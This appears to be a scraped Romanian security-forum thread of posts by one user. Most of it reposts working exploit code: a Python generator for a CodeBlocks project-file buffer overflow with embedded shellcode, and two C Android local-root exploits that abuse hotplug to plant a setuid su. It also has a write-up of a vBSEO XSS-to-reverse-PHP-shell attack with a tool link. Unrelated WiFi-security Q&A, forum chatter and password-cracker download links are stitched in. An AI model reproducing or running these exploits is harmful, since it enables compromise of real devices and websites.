Nytro

CodeBlocks v8.02 (cbp) Buffer Overflow Exploit #!/usr/bin/python import sys,os,shutil if len(sys.argv) != 3: print "------------------------------------------------" print "CodeBlocks (cbp) Buffer Overflow Exploit " print "Usage : exploit.py <project_name> <path>" print "Example : exploit.py sploit_proj c:\proj\\ " print "By : sup3r " print "------------------------------------------------" sys.exit(0) name = sys.argv[1] path = sys.argv[2] header1=( "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20" "\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x73\x74\x61" "\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\x79\x65\x73\x22\x20\x3f\x3e\x0a\x3c\x43\x6f" "\x64\x65\x42\x6c\x6f\x63\x6b\x73\x5f\x70\x72\x6f\x6a\x65\x63\x74\x5f\x66\x69\x6c" "\x65\x3e\x0a\x09\x3c\x46\x69\x6c\x65\x56\x65\x72\x73\x69\x6f\x6e\x20\x6d\x61\x6a" "\x6f\x72\x3d\x22\x31\x22\x20\x6d\x69\x6e\x6f\x72\x3d\x22\x36\x22\x20\x2f\x3e\x0a" "\x09\x3c\x50\x72\x6f\x6a\x65\x63\x74\x3e\x0a\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e" "\x20\x74\x69\x74\x6c\x65\x3d\x22"+name+"\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x4f" "\x70\x74\x69\x6f\x6e\x20\x70\x63\x68\x5f\x6d\x6f\x64\x65\x3d\x22\x32\x22\x20\x2f" "\x3e\x0a\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72" "\x3d\x22\x67\x63\x63\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x42\x75\x69\x6c\x64\x3e\x0a" "\x09\x09\x09\x3c\x54\x61\x72\x67\x65\x74\x20\x74\x69\x74\x6c\x65\x3d\x22\x44\x65" "\x62\x75\x67\x22\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x6f\x75" "\x74\x70\x75\x74\x3d\x22") header2=( "\x22\x20\x70\x72\x65\x66\x69\x78\x5f\x61\x75\x74\x6f\x3d\x22\x31\x22\x20\x65\x78" "\x74\x65\x6e\x73\x69\x6f\x6e\x5f\x61\x75\x74\x6f\x3d\x22\x31\x22\x20\x2f\x3e\x0a" "\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x6f\x62\x6a\x65\x63\x74\x5f\x6f" "\x75\x74\x70\x75\x74\x3d\x22\x6f\x62\x6a\x5c\x44\x65\x62\x75\x67\x5c\x22\x20\x2f" "\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x74\x79\x70\x65\x3d\x22" "\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f" "\x6d\x70\x69\x6c\x65\x72\x3d\x22\x67\x63\x63\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09" "\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x09\x09\x3c\x41\x64\x64" "\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x67\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09" "\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x3c\x2f\x54\x61\x72" "\x67\x65\x74\x3e\x0a\x09\x09\x09\x3c\x54\x61\x72\x67\x65\x74\x20\x74\x69\x74\x6c" "\x65\x3d\x22\x52\x65\x6c\x65\x61\x73\x65\x22\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70" "\x74\x69\x6f\x6e\x20\x6f\x75\x74\x70\x75\x74\x3d\x22\x62\x69\x6e\x5c\x52\x65\x6c" "\x65\x61\x73\x65\x5c"+name+"\x22\x20\x70\x72\x65\x66\x69\x78\x5f\x61\x75\x74" "\x6f\x3d\x22\x31\x22\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x5f\x61\x75\x74\x6f" "\x3d\x22\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20" "\x6f\x62\x6a\x65\x63\x74\x5f\x6f\x75\x74\x70\x75\x74\x3d\x22\x6f\x62\x6a\x5c\x52" "\x65\x6c\x65\x61\x73\x65\x5c\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74" "\x69\x6f\x6e\x20\x74\x79\x70\x65\x3d\x22\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09" "\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72\x3d\x22\x67\x63" "\x63\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e" "\x0a\x09\x09\x09\x09\x09\x3c\x41\x64\x64\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d" "\x4f\x32\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65" "\x72\x3e\x0a\x09\x09\x09\x09\x3c\x4c\x69\x6e\x6b\x65\x72\x3e\x0a\x09\x09\x09\x09" "\x09\x3c\x41\x64\x64\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x73\x22\x20\x2f\x3e" "\x0a\x09\x09\x09\x09\x3c\x2f\x4c\x69\x6e\x6b\x65\x72\x3e\x0a\x09\x09\x09\x3c\x2f" "\x54\x61\x72\x67\x65\x74\x3e\x0a\x09\x09\x3c\x2f\x42\x75\x69\x6c\x64\x3e\x0a\x09" "\x09\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x3c\x41\x64\x64\x20" "\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x57\x61\x6c\x6c\x22\x20\x2f\x3e\x0a\x09\x09" "\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x3c\x55\x6e\x69\x74\x20" "\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x6d\x61\x69\x6e\x2e\x63\x22\x3e\x0a\x09" "\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72\x56\x61" "\x72\x3d\x22\x43\x43\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x2f\x55\x6e\x69\x74\x3e\x0a" "\x09\x09\x3c\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x73\x3e\x0a\x09\x09\x09\x3c\x63" "\x6f\x64\x65\x5f\x63\x6f\x6d\x70\x6c\x65\x74\x69\x6f\x6e\x20\x2f\x3e\x0a\x09\x09" "\x09\x3c\x64\x65\x62\x75\x67\x67\x65\x72\x20\x2f\x3e\x0a\x09\x09\x3c\x2f\x45\x78" "\x74\x65\x6e\x73\x69\x6f\x6e\x73\x3e\x0a\x09\x3c\x2f\x50\x72\x6f\x6a\x65\x63\x74" "\x3e\x0a\x3c\x2f\x43\x6f\x64\x65\x42\x6c\x6f\x63\x6b\x73\x5f\x70\x72\x6f\x6a\x65" "\x63\x74\x5f\x66\x69\x6c\x65\x3e\x0a") c_file=( "#include <stdio.h>\n" "#include <stdlib.h>\n\n" "int main()\n" "{\r\n" " printf(\"Don't compile \");\n" " return 0;\n" "}\r\n") #calc shellcode -> 375 bytes shellcode=( "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIvSkymS8iKnKizNkipta" "4XtckmQ2SuCZMwgQQrVK3zKKL8bJTVqioWuCFZMR79Z4sN1mLEmqcz5WfLnimlbTOkz7YhM" "TVLjgORFvCiZQgVcUvmQxo71MCmQS2ZJxVlK1kjLZuoZOrZvPC2EBRnxL28JWY9YTVLjdPP" "f5KvjimNRTKSpompftKYZ47UVMNeMrrxiZtppx6MYMLvaCvrHjwvYqj2FV7rmKMOm6khlKM" "OuUOMzCOQvNwl1T6xmwgKzUNZqQXRPMPNmaQo8Nnpnn77Jq6k5pilYJ4mNQojymXqwvyUFO" "ytJPtq0vzNn7gw1CFtJA") payload = header1 payload += "\x41"*(4072-len(path)) payload += "\x74\x06\x41\x41" payload += "xp" payload += "\x30\x71" payload += "\x61"*169 payload += "\x41"*111 payload += shellcode payload += "\x61"*(6720-len(shellcode)) payload += header2 try: shutil.rmtree(path) except os.error: pass try: os.mkdir(path) cbp = open(path+name+'.cbp', 'w') cbp.write(payload) cbp.close() main = open(path+'main.c', 'w') main.write(c_file) raw_input("[x] Exploit project created!") except: print "Error!" Sursa: CodeBlocks v8.02 (cbp) Buffer Overflow Exploit Cred ca inca sunt multi utilizatori ai acelei versiuni. Eu am 10.05, are cineva 8.02 ca sa incerce?

Android 1.x/2.x Local Root Exploit /* android 1.x/2.x the real youdev feat. init local root exploit. * (C) 2009/2010 by The Android Exploid Crew. * * Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run. * Or use /data/local/tmp if available (thx to ioerror!) It is important to * to use /sqlite_stmt_journals directory if available. * Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc} * or use USB keys etc. This will invoke hotplug which is actually * our exploit making /system/bin/rootshell. * This exploit requires /etc/firmware directory, e.g. it will * run on real devices and not inside the emulator. * I'd like to have this exploitet by using the same blockdevice trick * as in udev, but internal structures only allow world writable char * devices, not block devices, so I used the firmware subsystem. * * !!!This is PoC code for educational purposes only!!! * If you run it, it might crash your device and make it unusable! * So you use it at your own risk! * * Thx to all the TAEC supporters. */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <linux/netlink.h> #include <fcntl.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <string.h> #include <unistd.h> #include <sys/stat.h> #include <signal.h> #include <sys/mount.h> #define SECRET "secretlol" void die(const char *msg) { perror(msg); exit(errno); } void copy(const char *from, const char *to) { int fd1, fd2; char buf[0x1000]; ssize_t r = 0; if ((fd1 = open(from, O_RDONLY)) < 0) die("[-] open"); if ((fd2 = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600)) < 0) die("[-] open"); for ( { r = read(fd1, buf, sizeof(buf)); if (r < 0) die("[-] read"); if (r == 0) break; if (write(fd2, buf, r) != r) die("[-] write"); } close(fd1); close(fd2); sync(); sync(); } void clear_hotplug() { int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC); write(ofd, "", 1); close(ofd); } int main(int argc, char **argv, char **env) { char buf[512], path[512]; int ofd; struct sockaddr_nl snl; struct iovec iov = {buf, sizeof(buf)}; struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0}; int sock; char *basedir = NULL; /* I hope there is no LD_ bug in androids rtld */ /*if (geteuid() == 0 && getuid() != 0) rootshell(env);*/ if (readlink("/proc/self/exe", path, sizeof(path)) < 0) die("[-] readlink"); if (geteuid() == 0) { clear_hotplug(); /* remount /system rw */ //DROID 1 and Ally //mount("/dev/block/mtdblock4", "/system", "yaffs2", MS_REMOUNT, 0); //DROID X //mount("/dev/block/mmcblk1p21", "/system", "ext3", MS_REMOUNT, 0); //GALAXY S mount("/dev/block/stl9","/system", "rfs", MS_REMOUNT, 0); //Eris and HTC Hero //mount("/dev/block/mtdblock3", "/system", "yaffs2", MS_REMOUNT, 0); //copy("/sdcard/su","/system/bin/su"); //copy("/sdcard/Superuser.apk","/system/app/Superuser.apk"); copy("/data/data/com.unstableapps.easyroot/files/su","/system/bin/su"); copy("/data/data/com.unstableapps.easyroot/files/Superuser.apk","/system/app/Superuser.apk"); chmod("/system/bin/su", 04755); chmod("/system/app/Superuser.apk", 04744); for (; } //basedir = "/sqlite_stmt_journals"; basedir = "/data/data/com.unstableapps.easyroot/files"; if (chdir(basedir) < 0) { basedir = "/data/local/tmp"; if (chdir(basedir) < 0) basedir = strdup(getcwd(buf, sizeof(buf))); } memset(&snl, 0, sizeof(snl)); snl.nl_pid = 1; snl.nl_family = AF_NETLINK; if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0) die("[-] socket"); close(creat("loading", 0666)); if ((ofd = creat("hotplug", 0644)) < 0) die("[-] creat"); if (write(ofd, path , strlen(path)) < 0) die("[-] write"); close(ofd); symlink("/proc/sys/kernel/hotplug", "data"); snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c" "SUBSYSTEM=firmware%c" "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0); printf("[+] sending add message ...\n"); if (sendmsg(sock, &msg, 0) < 0) die("[-] sendmsg"); close(sock); sleep(3); return 0; } Sursa: Android 1.x/2.x Local Root Exploit Android 1.x/2.x HTC Wildfire Local Root Exploit /* android 1.x/2.x the real youdev feat. init local root exploit. * * * Modifications to original exploit for HTC Wildfire Stage 1 soft-root (c) 2010 Martin Paul Eve * Changes: * -- Will not remount /system rw (NAND protection renders this pointless) * -- Doesn't copy self, merely chmods permissions of original executable * -- No password required for rootshell (designed to be immediately removed once su binary is in place) * * Revised usage instructions: * -- Copy to /sqlite_stmt_journals/exploid and /sqlite_stmt_journals/su * -- chmod exploid to 755 * -- Execute the binary * -- Enable or disable a hotplug item (wifi, bluetooth etc. -- this could be done automatically by an app that packaged this exploit) -- don't worry that it segfaults * -- Execute it again to gain rootshell * -- Copy to device (/sqlite_stmt_journals/) + chown/chmod su to 04711 * -- Delete original exploid * -- Use modified Superuser app with misplaced su binary * * Explanatory notes: * -- This is designed to be used with a modified superuser app (not yet written) which will use the su binary in /sqlite_stmt_journals/ * -- It is important that you delete the original exploid binary because, otherwise, any application can gain root * * Original copyright/usage information * * (C) 2009/2010 by The Android Exploid Crew. * * Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run. * Or use /data/local/tmp if available (thx to ioerror!) It is important to * to use /sqlite_stmt_journals directory if available. * Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc} * or use USB keys etc. This will invoke hotplug which is actually * our exploit making /system/bin/rootshell. * This exploit requires /etc/firmware directory, e.g. it will * run on real devices and not inside the emulator. * I'd like to have this exploitet by using the same blockdevice trick * as in udev, but internal structures only allow world writable char * devices, not block devices, so I used the firmware subsystem. * * !!!This is PoC code for educational purposes only!!! * If you run it, it might crash your device and make it unusable! * So you use it at your own risk! * * Thx to all the TAEC supporters. * */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <linux/netlink.h> #include <fcntl.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <string.h> #include <unistd.h> #include <sys/stat.h> #include <signal.h> #include <sys/mount.h> void die(const char *msg) { perror(msg); exit(errno); } void clear_hotplug() { int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC); write(ofd, "", 1); close(ofd); } void rootshell(char **env) { char pwd[128]; char *sh[] = {"/system/bin/sh", 0}; setuid(0); setgid(0); execve(*sh, sh, env); die("[-] execve"); } int main(int argc, char **argv, char **env) { char buf[512], path[512]; int ofd; struct sockaddr_nl snl; struct iovec iov = {buf, sizeof(buf)}; struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0}; int sock; char *basedir = NULL, *logmessage; /* I hope there is no LD_ bug in androids rtld */ if (geteuid() == 0 && getuid() != 0) rootshell(env); if (readlink("/proc/self/exe", path, sizeof(path)) < 0) die("[-] readlink"); if (geteuid() == 0) { clear_hotplug(); chown(path, 0, 0); chmod(path, 04711); chown("/sqlite_stmt_journals/su", 0, 0); chmod("/sqlite_stmt_journals/su", 06755); return 0; } printf("[*] Android local root exploid (C) The Android Exploid Crew\n"); printf("[*] Modified by Martin Paul Eve for Wildfire Stage 1 soft-root\n"); basedir = "/sqlite_stmt_journals"; if (chdir(basedir) < 0) { basedir = "/data/local/tmp"; if (chdir(basedir) < 0) basedir = strdup(getcwd(buf, sizeof(buf))); } printf("[+] Using basedir=%s, path=%s\n", basedir, path); printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n"); memset(&snl, 0, sizeof(snl)); snl.nl_pid = 1; snl.nl_family = AF_NETLINK; if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0) die("[-] socket"); close(creat("loading", 0666)); if ((ofd = creat("hotplug", 0644)) < 0) die("[-] creat"); if (write(ofd, path , strlen(path)) < 0) die("[-] write"); close(ofd); symlink("/proc/sys/kernel/hotplug", "data"); snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c" "SUBSYSTEM=firmware%c" "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0); printf("[+] sending add message ...\n"); if (sendmsg(sock, &msg, 0) < 0) die("[-] sendmsg"); close(sock); printf("[*] Try to invoke hotplug now, clicking at the wireless\n" "[*] settings, plugin USB key etc.\n" "[*] You succeeded if you find /system/bin/rootshell.\n" "[*] GUI might hang/restart meanwhile so be patient.\n"); return 0; } Sursa: Android 1.x/2.x HTC Wildfire Local Root Exploit

vbSEO – From XSS to Reverse PHP Shell XSS is not a big deal, or is it? On many occasions, I’ve seen this vulnerability being classified as useless, not serious, and being a low threat. What I’ve always had in mind is that it’s only the capabilities of the browser, and the hackers mind which sets the limit for a XSS attack. http://www.exploit-db.com/images/maxevbseo/webtool16.png It may seem impossible to do anything else other than stealing sessions, cookies and performing phishing, client side defacements etc. But take a look at the picture above, that is a reverse php shell automatically injected into the site, when a vBulletin administrator viewed a malicious linkback. The vulnerability itself I’m referring to, is a 0day within vBSEO which exists within the administrator and moderator panel only. However, the attacker is able to inject persistent scripts via this linkback feature directly into the part of these panels handling these linkbacks. http://www.exploit-db.com/images/maxevbseo/webtool06.png In short, the attacker crafts a malicious HTML page as shown in the advisory. Then, the attacker clicks a link to the target forum with vBSEO installed, and when the target is reached, vBSEO performs a GET-request to the attacker’s malicious HTML page (if it’s served online and if RefBacks are enabled). The title of this page is then loaded directly into the database, and an administrator can see it sanitized in the actual thread, but also in the admin and mod panel where the title is not sanitized at all, allowing the script to run. What is actually possible? After discovering and researching this vulnerability, I realised it was a fine case to do further studies on and then develop a XSS worm. Fortunately I got away from that idea due to the fact it could’ve been abused globally on forums with vBSEO installed. However, the idea itself was not bad so I began developing the payload aka the javascript, which would eventually inject a PHP payload via the nice plugin feature in vBulletin. http://www.exploit-db.com/images/maxevbseo/webtool12.png Initially, the XSS trojan I wrote should be able to do all of this silently without the user knowing, so instead of document.write being used, appendChild which uses DOM objects, was used instead. This took a bit more work in order to function better, but the result was that the visible window would not change to the affected user getting infected with this trojan. http://www.exploit-db.com/images/maxevbseo/webtool09.png When the user browses to, in this case “Moderate Linkbacks”, the script is executing as soon as the user hits that page. When this happens, the trojan checks whether infection has already happened once and if not, continues. Then an iframe is created outside the visible frames, where the adminhash and securitytoken (CSRF-token) is read and saved in a local variable in the browser. Then a new form is injected into this iframe, which contains the adminhash and the securitytoken. The form itself contains the values needed to create a new and completely valid plugin which in this case, is PHP code. At this point, the script checks again if the user has already been infected and if not, the form is submitted, the plugin is created, and a cookie is set to prevent the script from going in loops. http://www.exploit-db.com/images/maxevbseo/webtool10.png Most administrators, would notice the broken lock icon in case they use HTTPS / SSL, and then they would view the source. The great thing about using javascript to create HTML objects, especially with “appendChild” etc. is that it is not visible. A debugger, such as Firebug shown in the picture above is needed, unless the admin finds the malicious javascript payload and reads what it does, but then it might be too late. During the execution of the XSS trojan, a time-out is set. When time runs out, the XSS trojan will try to delete itself leaving almost no traces, besides the possible injected plugin, and the remains of the hidden iframe outside the frames which cannot be viewed due to the way HTML works in FireFox. http://www.exploit-db.com/images/maxevbseo/webtool13.png If the attacker was successful, and patient as well, he would eventually see that the target website had already connected back to retrieve the title, but also that another user had triggered the XSS Trojan which hopefully injected the PHP plugin specified by the attacker. http://www.exploit-db.com/images/maxevbseo/webtool01.png So what’s this tool I’ve been using during my presentation of this vulnerability? It’s a recently developed tool written in Python, where the payload is written in Javascript, freely available to anyone in the bottom of this blog. I recommend however, that a user of this tool looks inside the source code. Is XSS a serious threat then? Yes, it definitely is. For a demonstration of the tool and this vulnerability, check either the YouTube or RapidShare link below. References: Advisory: vBSEO 3.5.2 & 3.2.2 - Persistent XSS via LinkBacks Advisory #2: vBSEO Sitemap 2.5 & 3.0 - Multiple Vulnerabilities EvilWebTool: http://www.exploit-db.com/sploits/evilwebtool.tar.gz YT Video: HQ Video: http://rapidshare.com/files/445021103/vbseo_0day.mp4 Sursa: vbSEO – From XSS to Reverse PHP Shell PS: Fisierul JS (trojan.js) din arhiva EvilWebTool are ca referinta un articol de aici, de pe RST.

In cel al victimei desigur. Apoi probabil o uploadeaza undeva unde sa o poata vedea atacatorul.

Ce tare, redirect catre un executabil. Sa ma uit putin peste el, poate gasesc ceva interesant.

Întreb?ri de la cititorii ?i r?spunsuri de la autorii MalwareCity 1. De ce toat? lumea recomand? folosirea cript?rii de tip WPA sau WPA2, în locul celei WEP? Protocolul de criptare WEP (Wired Equivalent Privacy - „Confiden?ialitate echivalent? cu cea a unei conexiuni standard prin fir”) dateaz? din 1997. De-a lungul timpului, s-a demonstrat c? acest protocol are câteva erori de proiectare, care permit unui atacator s?-l sparg? în doar câteva minute. WPA ?i WPA2 (Wi-Fi Protected Access - „Acces Wi-Fi protejat”) sunt mult mai sigure decât protocolul WEP, care, de?i dep??it din punct de vedere tehnologic, este p?strat din cauza problemelor de compatibilitate cu echipamentele hardware mai vechi. În concluzie, dac? echipamentele dumneavoastr? suport? WPA sau WPA2, folosi?i-le pe acestea. De asemenea, v? sugerez s? arunca?i o privire ?i peste ghidul pe care l-am scris despre securizarea re?elelor wireless, pentru detalii suplimentare. 2. Cât de multe re?ele wireless pot exista într-o înc?pere ?i câte dintre ele pot fi securizate? Comunicarea wireless func?ioneaz? dup? acelea?i principii pe care le utilizeaz? ?i re?elele cu fir, cu singura excep?ie c? informa?ia circul? prin intermediul undelor radio în loc de fire de cupru. Astfel, pentru a comunica între ele, dispozitivele trebuie s? fac? parte dintr-o re?ea, pas ce este condi?ionat de nivelul de autentificare al re?elei. Ceea ce vede?i afi?at în gestionarul de conexiuni în re?ea este numele respectivei re?ele sau SSID-ul ei (Service Set IDentifier – „Identificatorul Setului de Serviciu”), care emite un semnal prin care avertizeaz? utilizatorii de existen?a unei re?ele la care se pot conecta. Totu?i, faptul c? vede?i re?eaua nu înseamn? neap?rat c? ve?i putea transmite ?i recep?iona date prin respectiva re?ea, decât dup? ce v-a?i conectat la ea. Celelalte re?ele wireless vor fi în continuare vizibile pentru calculator, cât? vreme se g?se?te în acela?i spa?iu fizic în care re?elele emit ?i calculatorul le poate „detecta”. Altfel spus, dac? sistemul dumneavoastr? nu se g?se?te în raza de ac?iune a celorlalte routere care emit semnal, el nu va putea s? „detecteze” celelalte re?ele. Ceea ce face ca informa?ia care circul? într-o re?ea s? r?mân? în interiorul acelei re?ele ?i s? nu fie interceptat? se nume?te criptare. De fapt, cheia de criptare este cea care nu v? permite s? intercepta?i traficul de date dintre doi clien?i legitimi (cum ar fi cel dintre router-ul ?i calculatorul vecinului dumneavoastr?). Chiar dac? pute?i s?-l intercepta?i fizic, el nu v? va spune nimic, fiindc? este protejat prin criptare de „privirile indiscrete”. 3. Cum pot s?-mi p?strez sistemul în siguran?? atunci când m? conectez la o re?ea wireless nesecurizat?? Dac? folosi?i o re?ea nesecurizat?, precum cea din c?min, bibliotec? sau dintr-o cafenea, v-a? recomanda s? evita?i pe cât posibil s? v? accesa?i conturile de e-mail, bancare etc. Un firewall bun v? ajut? s? restric?iona?i accesul la calculatorul dumneavoastr?, refuzând comunicarea pe anumite porturi considerate nesigure. Firewall-ul BitDefender are un mod Public, care nu numai c? v? filtreaz? comunicarea, dar v? ?i deconecteaz? resursele partajate în mod normal într-o re?ea, astfel încât s? nu v? expun? datele unui atacator conectat la aceea?i re?ea nesecurizat?. 4. Care este cea mai bun? modalitate de a ?ine al?i utilizatori la distan?? de propria mea re?ea wireless? Cel mai simplu mod este s? folosi?i criptarea WPA/WPA2 ?i s? v? securiza?i sec?iunea administrativ? a router-ului cu o parol? complex?. Ghidul de securitate pentru re?ele wireless pe care l-am publicat s?pt?mâna trecut? e un bun pas de pornire dac? inten?iona?i s? v? instala?i ?i s? configura?i propria re?ea sau dac? ave?i de gând s? spori?i gradul de securitate al celei existente. Cam atât pentru azi. Dac? dori?i s? primi?i un r?spuns la întreb?rile sau nel?muririle pe teme de securitate informatic?, nu ezita?i s?-mi scrie?i, folosind formularul de sub acest articol. Autor: Bogdan Botezatu Sursa: Po?ta redac?iei ? Episodul 1 - MalwareCity România : Blog de Securitate

Interesant, mai ales ca eu sunt din Valcea. Cica "Hackerville" Si cei de acolo nu stiu sa faca o pagina de scam, puneau adresa de mail la care se duceau datele ca <input type="hidden" />, dadeau mancare la boschetari si le plateau orele la Internet Cafe ca sa stea sa Copy-Paste-uiasca manual adrese de mail, cei mai multi erau paraleli cu calculatoarele si se mai mira lumea cum de sunt prinsi... Chiar vorbeam cu cineva despre asta, cred ca foarte putini s-au gandit sa porneasca o afacere in loc sa ia un Audi, foarte putini s-au gandit sa spele banii... Dar na, si asta a contribuit la semnificatia mass-media a cuvantului "hacker", si cica suntem o tara de "hackeri", nu o tara de hoti, cand de fapt asta au fost si ei. Dar e bine, e loc pentru toata lumea la puscarie, acolo sa stea.

Hai sa discutam pe aceasta tema interesanta, sa dezbatem daca banul a fost meritat, sa clasificam limbajul victimei intr-unul adecvat sau unul potrivit coeficientului mediu de inteligenta de aici, sa aducem afirmatii pe care sa le sustinem cu dovezi concludente, stiti voi, ca in celelalte astfel de discutii de pe aici in care se implica numai persoane cu capabilitati intelectuale deosebite...

Iar ne-am adunat ca mustele la cacat. Felicitari.

Bun asa, mai scapam de ratati. Hai, aratati cat va duce capul.

As putea sa ii sterg posturile, dar face reclama negativa, bun baiat, ne arati cat de "smecher" e acel forum.

S-a inchis proiectul. S-au strans foarte putine articole. Poate se va redeschide ideea dupa ce termin cu sesiunea, cand voi termina un articol deja inceput si poate voi mai scrie unul.

Inca o "chestie" aniversara. Multumim pentru activitate, sper ca veti fi activi si pe viitor, dar sper sa va mai si maturizati si sa va ganditi si la lucruri mai serioase cum ar fi temele acestui forum. PS: Daca vreti un viitor in domeniul informaticii, ar trebui sa va ganditi mai profund la ce am spus mai sus, aici va puteti forma o baza solida, dar totul depinde de voi. La cat mai multe posturi (de o calitate mai ridicata)!

Cred ca Viz0n. La profil scrie ca e o fata de 15 ani dar nu prea cred. Oricum, nu asta conteaza, conteaza ca se ocupa de problemele site-ului. Au fost niste probleme cu inregistrarile, cu DNS-ul pentru IRC si altele si au fost remediate foarte repede. Se ocupa de site.

Tampenie veche si inutile. Topic inchis.

E un forum mai serios, cateva persoane care posteaza, le pasa de forum si de informatiile care se posteaza, nu prea am vazut aberatii sau intrebari stupide. Imi place, cel putin momentan. Stiu ca probabil ati auzit de el. http://r00tsecurity.org/forums/

Si pe ce criterii se vor alege utilizatorii? Zicem ca imi fac contul "x". Cont care nu il am si pe alte site-uri, deci nu vei putea stii cine sunt. Cine va fi ales, si cine nu? Se pot face neaprobari pentru useri ca "HackerCracker1337", dar cred ca numele de utilizator nu este de ajuns.

"Security Stuff" este o arie vasta. Pe langa un numar limitat de utilizatori care vor fi alesi de tine si de membrii alesi de tine, care ar fi noutatile? Va fi strict tehnic si nu se vor permite aberatiile?

Hashcat v.0.35 - Hash Password Recovery * Free * Multi-Threaded * Multi-Hash * Linux & Windows native binaries * quickest cpu-based multihash cracker * SSE2 accelerated * All Attack-Modes except Brute-Force and Permutation can be extended by rules * quick Rule-engine * Rules mostly compatible with JTR and PasswordsPro * feasible to resume or limit session * Automatically recognizes recovered hashes from outfile at startup * Can automatically generate random rules * Load hashlist with over 3 million hashes of any type at once * Load saltlist from external file and then use them in a Brute-Force Attack variant * Able to work in an distributed environment * Specify multiple wordlists and also multiple directories of wordlists * Number of threads can be configured * Threads run on lowest priority * 30+ Algorithms implemented with performance in mind * and more Source: hashcat - advanced password recovery Download: http://hashcat.net/files/hashcat-0.35.rar Hashcat GUI: http://hashcat.net/files/hashcat-gui-0.2.453.rar Read more: MD5 Crackers | Password Recovery | Wordlist Downloads

Whitepixel - ATI MD5 BruteForcer Whitepixel is an open source (GPLv3) GPU-accelerated password hash auditing software for AMD/ATI graphics cards. It is currently the world's fastest single-hash MD5 brute forcer. * For AMD Radeon HD 5000 series and above * Multi-GPU support (tested with 8 GPUs) * Best MD5 implementation: uses bitalign IL instruction, BFI_INT native instruction, reversing * Open source: GPLv3 * Basic configurable charsets Download: http://whitepixel.zorinaq.com/files/whitepixel-2.tar.bz2 Source: whitepixel - GPU-accelerated password hash auditing Read more: MD5 Crackers | Password Recovery | Wordlist Downloads

